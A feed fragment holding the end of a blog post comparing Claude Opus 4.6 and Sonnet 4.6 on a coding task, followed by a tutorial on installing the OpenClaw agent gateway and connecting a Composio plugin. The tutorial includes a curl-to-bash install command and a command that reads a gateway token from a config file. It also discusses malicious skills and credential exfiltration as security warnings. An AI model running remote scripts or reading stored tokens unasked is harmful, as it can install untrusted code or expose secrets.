&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsqzh8pvcjr55pcoomiyp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsqzh8pvcjr55pcoomiyp.png" alt="Opus 4.6 generating checklist of work done"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the demo of the working CLI:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The API key visible in the below demo videos has been revoked. Please don’t try to use it.&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/Xl_bAuPbVLg"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;...and how it integrates with Tensorlake:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/vzcNRkwQPAM"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here in a patch file: &lt;a href="https://github.com/tensorlakeai/tensorlake-website/tree/main/research-pack/research_pack" rel="noopener noreferrer"&gt;Opus 4.6 Patch file&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; ~$1.001&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ &lt;strong&gt;NOTE:&lt;/strong&gt; As I'm using a Claude plan and not on API usage, this is roughly calculated based on the input/output tokens.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; 20 minutes 6 seconds + ~1 min 40 sec for the fix&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output Token Usage:&lt;/strong&gt; 33.2K + ~4K for the fix&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; 156 files changed, 95013 insertions(+)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;ℹ️ You can see the complexity of the project for yourself, and you’ll probably be shocked at how good these models have gotten. It’s no longer just boilerplate or small refactors. They can build a complete, end-to-end project from scratch from a single prompt. We’re officially in the real AI era.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Claude Sonnet 4.6
&lt;/h3&gt;

&lt;p&gt;Sonnet was… close, but not quite as clean as Opus.&lt;/p&gt;

&lt;p&gt;Just like Opus, it ran into a test failure during the run. This is one of those things you’ll notice with similar models: same prompt, same codebase, and they sometimes hit the exact similar weird issue.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4m06o4om4xy8h0n9avap.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4m06o4om4xy8h0n9avap.png" alt="Claude Sonnet 4.6 project build error"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here’s the demo of the CLI (you’ll see it mostly working, but there are some rough edges) and not as well implemented as Opus:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/A_4ZiT30pGs"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;...and how it integrates with Tensorlake:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/kzzzrobQ15I"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;It's not working as you can see. Sonnet did attempt a fix, but still couldn't get to a working state with Tensorlake. But overall, it was super close.&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://github.com/tensorlakeai/tensorlake-website/tree/main/research-pack-sonnet" rel="noopener noreferrer"&gt;Sonnet 4.6 Patch&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; ~$0.87&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Same as Opus 4.6, this is an approximate cost based on the input/output tokens.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; 33 minutes 48 seconds + ~3m 18s for the attempted fix&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output Token Usage:&lt;/strong&gt; 52.9K + ~5K for the fix (didn't work)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; 88 files changed, 23253 insertions(+)&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;p&gt;🤷‍♂️ I can’t really complain about Sonnet’s performance, other than this one issue. It still got almost everything working. And to be fair, Sonnet isn’t Anthropic’s flagship coding model like Opus. It’s more of a general-purpose model, and Opus also comes with a pretty big cost difference, so the gap in code quality is kind of expected.&lt;/p&gt;

&lt;p&gt;And please don’t try using the API keys shown in the video, as it’s already revoked.&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Opus as a lineup is just too good. If you want an end-to-end product that works most of the time with minimal hand-holding, go with Opus. If you want something cheaper, and you’re okay finishing the last bit yourself, Sonnet is still solid.&lt;/p&gt;

&lt;p&gt;Even in this one test, you can already see the gap in implementation quality, token usage, and time spent.&lt;/p&gt;

&lt;p&gt;And if Anthropic can cut Opus to half its price, or even get it close to Sonnet’s, it’d be over for most other models.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxjd3t2007csw2j79ko0e.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxjd3t2007csw2j79ko0e.gif" alt="Shocked GIF"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For me, the best way to use these models is still the same: let them build most of it fast, then run it, test it, and clean up the rough parts yourself.&lt;/p&gt;

&lt;p&gt;Let me know your thoughts in the comments. ✌️&lt;/p&gt;

</description>
      <category>ai</category>
      <category>programming</category>
      <category>python</category>
      <category>productivity</category>
    </item>
    <item>
      <title>How to set up Secure OpenClaw and power it with 850+ SaaS Apps 🦞🔒</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Thu, 05 Mar 2026 13:26:54 +0000</pubDate>
      <link>https://forem.com/composiodev/how-to-set-up-secure-openclaw-and-power-it-with-850-saas-apps-5d5j</link>
      <guid>https://forem.com/composiodev/how-to-set-up-secure-openclaw-and-power-it-with-850-saas-apps-5d5j</guid>
      <description>&lt;p&gt;OpenClaw has been showing up in my feed way too much, so I finally sat down and tested it properly, and yeah, it comes with a few real problems.&lt;/p&gt;

&lt;p&gt;In this post, I’ll cover what OpenClaw is, how to set it up, where the security risks really come from, and how to use &lt;strong&gt;safer remote integrations&lt;/strong&gt; so you can make it a bit more secure and save yourself some stress.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0zoa277kk0pcvkygsv18.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0zoa277kk0pcvkygsv18.png" alt="OpenClaw banter on the internet" width="800" height="416"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;If you just want the takeaway, here’s the deal with OpenClaw:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;OpenClaw is a local agent gateway.&lt;/strong&gt; It is the layer that connects your LLM (OpenAI, Anthropic, etc.) to real tools and local execution.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;The “special sauce” is the package.&lt;/strong&gt; People like it because it ships as a usable bundle: built-in skills, a simple “agent brain” file (&lt;code&gt;SOUL.md&lt;/code&gt;), and easy chat support like messenger integrations.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Security is the big problem.&lt;/strong&gt; By design, it can touch files, run commands, and pull third-party skills. The least-bad way to use it is with &lt;strong&gt;remote, sandboxed integrations&lt;/strong&gt; (which I’ve shown how to set up).&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Also, watch your token bill.&lt;/strong&gt; It can be very inefficient and chew through credits fast, especially if you’re using hosted models instead of a local LLM.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Overall, you'll learn everything you need to understand and start with OpenClaw (and make it slightly better with secure integrations).&lt;/p&gt;




&lt;h2&gt;
  
  
  What's OpenClaw?
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmfs0cgc950ax7jj589gh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmfs0cgc950ax7jj589gh.png" alt="OpenClaw GitHub banner" width="800" height="289"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;OpenClaw is a personal AI assistant you run on your own machine (or a server you own). It is not a new model. It is the thing that actually sits between your model provider (OpenAI, Anthropic, Kimi, etc.) and the stuff you want done, such as messaging, tools, files, and integrations.&lt;/p&gt;

&lt;p&gt;Take this as a mental model:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Your LLM is the brain (thinks)&lt;/li&gt;
&lt;li&gt;OpenClaw is the body (it can do things)&lt;/li&gt;
&lt;li&gt;The Gateway is the receptionist (routes messages in and results out)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;So when people say “OpenClaw turns an LLM into an agent,” what they really mean is: it gives the model a runtime that can call tools, keep state, and show up where you already chat (WhatsApp, Telegram, Slack, Discord, etc.).&lt;/p&gt;

&lt;p&gt;Now, that's just the gist. There's a lot more to understand. I assume you've already worked with it, so I'm not going any deeper than this in the intro.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Febm07htbjdxc0m1aqlnm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Febm07htbjdxc0m1aqlnm.png" alt="OpenClaw anatomy" width="800" height="516"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  What's Special than something like Manus? 🤔
&lt;/h3&gt;

&lt;p&gt;Manus is essentially "agent as a product," but you're limited to their UI, tools, rules, and cloud.&lt;/p&gt;

&lt;p&gt;OpenClaw is more like “agent as a kit.” It’s meant to be installed, set up, and shaped around your &lt;strong&gt;own workflow&lt;/strong&gt;. You decide what models it uses, what tools it can touch, what data it can access, and where it runs.&lt;/p&gt;

&lt;p&gt;That's the biggest difference.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💁 "Manus is for convenience, and OpenClaw is for control."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Wow, that was a nice line I came up with on the fly. 😂&lt;/p&gt;




&lt;h2&gt;
  
  
  OpenClaw Installation
&lt;/h2&gt;

&lt;p&gt;You’ve got two clean ways to install OpenClaw. If you just want it running quickly, do the normal installation. If you’re even slightly paranoid (which you should be 😮‍💨), do Docker.&lt;/p&gt;

&lt;p&gt;The core requirement is &lt;strong&gt;Node ≥ 22&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Option 1: Normal install (recommended for most people)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Prereqs:&lt;/strong&gt; Node 22+ and an API key (OpenAI, Anthropic, OpenRouter, whatever you’re using).&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Install OpenClaw:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;curl &lt;span class="nt"&gt;-fsSL&lt;/span&gt; https://openclaw.ai/install.sh | bash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;Run onboarding (this sets up provider auth + gateway settings and can install the background service):
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw onboard &lt;span class="nt"&gt;--install-daemon&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;Check the gateway status (if you installed the service, it should already be running):
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw gateway status
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Optional:&lt;/strong&gt; Open the Control UI:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw dashboard
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Option 2: Docker (more isolated and secure)
&lt;/h3&gt;

&lt;p&gt;Docker is great when you want a throwaway environment or isolation from your host, but it introduces an important rule:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Containers only see plugins and config if they share the same OpenClaw state directory/volume. So, it comes with a little complexity.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Clone and start the Docker stack:
&lt;/li&gt;
&lt;/ol&gt;
&lt;/blockquote&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/openclaw/openclaw
&lt;span class="nb"&gt;cd &lt;/span&gt;openclaw
./docker-setup.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;💡 To know more about how/what it does, visit the &lt;a href="https://docs.openclaw.ai/install/docker#quick-start-recommended" rel="noopener noreferrer"&gt;OpenClaw Docker Quickstart&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Control UI gotchas
&lt;/h2&gt;

&lt;p&gt;If you open the Control UI, and it shows something like:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;unauthorized: gateway token missing&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That's normal. The UI needs a gateway token to connect.&lt;/p&gt;

&lt;p&gt;Get your token:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; ~/.openclaw/openclaw.json | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'.gateway.auth.token'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Make sure &lt;code&gt;jq&lt;/code&gt; is installed on your machine. Or, you can manually get the token from the config file &lt;code&gt;~/.openclaw/openclaw.json&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Then either:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Paste it in the UI (Overview → Gateway Access → Gateway Token)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmhiyeoiocmm7wwvkm22z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmhiyeoiocmm7wwvkm22z.png" alt="OpenClaw control UI" width="800" height="420"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Use a URL that includes it, for example via:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw dashboard &lt;span class="nt"&gt;--no-open&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgbfknrusautve6n1wu3e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgbfknrusautve6n1wu3e.png" alt="OpenClaw URL with a token" width="800" height="245"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  OpenClaw is bad for Security
&lt;/h2&gt;

&lt;p&gt;OpenClaw’s whole selling point is also the problem: it can read/write files, run shell commands, and load third party “skills.” That is basically “download random code from the internet and run it with your permissions,” except now an LLM is the one executing.&lt;/p&gt;

&lt;p&gt;What’s actually gone wrong in the wild (already):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Malicious skills on ClawHub:&lt;/strong&gt; researchers found hundreds to thousands of skills that were straight up malware or had critical issues, including credential theft and prompt injection patterns.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Prompt injection turning into installs:&lt;/strong&gt; there’s been at least one high profile incident where a prompt injection was used to push OpenClaw onto machines via an agent workflow.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exfiltrate API keys and tokens&lt;/strong&gt;: When your agent has full control of the computer, and when compromised, it can easily exfiltrate the API keys and tokens to attackers.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwt4rsqu3wykpix72papj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwt4rsqu3wykpix72papj.png" alt="OpenClaw security flaws blog post discussion" width="800" height="379"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If you’re still going to run it, do the bare minimum to not get cooked:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Don't trust skills you don't know. If you didn’t read it, don’t install it.&lt;/li&gt;
&lt;li&gt;Prefer OAuth-hosted integrations over pasting keys locally.&lt;/li&gt;
&lt;li&gt;Run it sandboxed (Docker) and keep it away from your real home directory.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you want to read more on OpenClaw’s security posture, we have a nice piece on it: &lt;a href="https://composio.dev/blog/openclaw-security-and-vulnerabilities" rel="noopener noreferrer"&gt;OpenClaw is a Security Nightmare Dressed Up as a Daydream&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Setting up safe Integrations
&lt;/h2&gt;

&lt;p&gt;So enough of that. Let's look into how you can make it a bit more secure.&lt;/p&gt;

&lt;p&gt;I assume you already have OpenClaw installed and have already done the initial setup onboarding. We’ll use Composio plugin, which gives us access to 850+ SaaS apps like Gmail, Outlook, Canva, YouTube, Twitter and more without you needing to manage OAuth tokens and integrations.&lt;/p&gt;

&lt;p&gt;Contrary to OpenClaw’s native integrations, the credentials do not stay in your system and neither a compromised Claw can access them. The credentials are securely hosted and managed by Composio.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Install Composio Plugin
&lt;/h3&gt;

&lt;p&gt;Composio’s OpenClaw plugin connects OpenClaw to Composio’s MCP endpoint and exposes third-party tools (GitHub, Gmail, Slack, Notion, etc.) through that layer without you needing to handle auth hassles.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw plugins &lt;span class="nb"&gt;install&lt;/span&gt; @composio/openclaw-plugin
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2. Composio Plugin Setup
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Log in at &lt;a href="https://dashboard.composio.dev/" rel="noopener noreferrer"&gt;dashboard.composio.dev&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Choose OpenClaw as the client.&lt;/li&gt;
&lt;li&gt;Copy your consumer key (&lt;code&gt;ck_...&lt;/code&gt;) from the Composio dashboard settings, then set it:&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftq7iwaghb2x4qh7r45nz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftq7iwaghb2x4qh7r45nz.png" alt="Composio Consumer Key generation" width="800" height="213"&gt;&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw config &lt;span class="nb"&gt;set &lt;/span&gt;plugins.entries.composio.config.consumerKey &lt;span class="s2"&gt;"ck_your_key_here"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3. Verify the plugin loaded
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw plugins list
openclaw logs &lt;span class="nt"&gt;--follow&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You're looking for something like "Composio loaded" and a "tools registered" message.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdpsvm2sy8geqomwkr1ri.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdpsvm2sy8geqomwkr1ri.png" alt="OpenClaw loading Composio plugins" width="800" height="219"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If the plugin is &lt;strong&gt;"loaded"&lt;/strong&gt;, it means that you can now successfully access Composio.&lt;/p&gt;

&lt;p&gt;Here's how it works:&lt;/p&gt;

&lt;p&gt;The plugin connects to Composio's MCP server at &lt;code&gt;https://connect.composio.dev/mcp&lt;/code&gt; and registers all available tools directly into the OpenClaw agent. Tools are called by name. No extra search or execute steps needed.&lt;/p&gt;

&lt;p&gt;If a tool returns an auth error, the agent will prompt you to connect that toolkit at &lt;a href="https://dashboard.composio.dev/" rel="noopener noreferrer"&gt;dashboard.composio.dev&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Here's how the configuration looks:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"plugins"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"entries"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"composio"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"enabled"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"config"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"consumerKey"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"ck_your_key_here"&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can configure the following options directly from the config file:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;enabled&lt;/code&gt;: enable or disable the plugin&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;consumerKey&lt;/code&gt;: your Composio consumer key&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;mcpUrl&lt;/code&gt;: the MCP server URL. By default, it's &lt;code&gt;https://connect.composio.dev/mcp&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Previously, you had to configure API keys per integration, but with Composio you don't have to care about any of that. Just make sure &lt;strong&gt;not to leak&lt;/strong&gt; the consumer key that we generated.&lt;/p&gt;

&lt;p&gt;And it's that simple. Everything works out of the box as you would use any other OpenClaw plugins!&lt;/p&gt;

&lt;p&gt;Now, to test if it works, head over to the Control UI chat and send a message, something like:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;“List the Composio tools you have available. Only print the result here”&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgllla2gksya8b9btu9pq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgllla2gksya8b9btu9pq.png" alt="OpenClaw chat session" width="800" height="420"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If it asks you to connect the tools, head over to &lt;a href="https://dashboard.composio.dev/" rel="noopener noreferrer"&gt;dashboard.composio.dev&lt;/a&gt; and connect each of the tools you require. It's as simple as clicking &lt;strong&gt;Connect&lt;/strong&gt;.&lt;/p&gt;

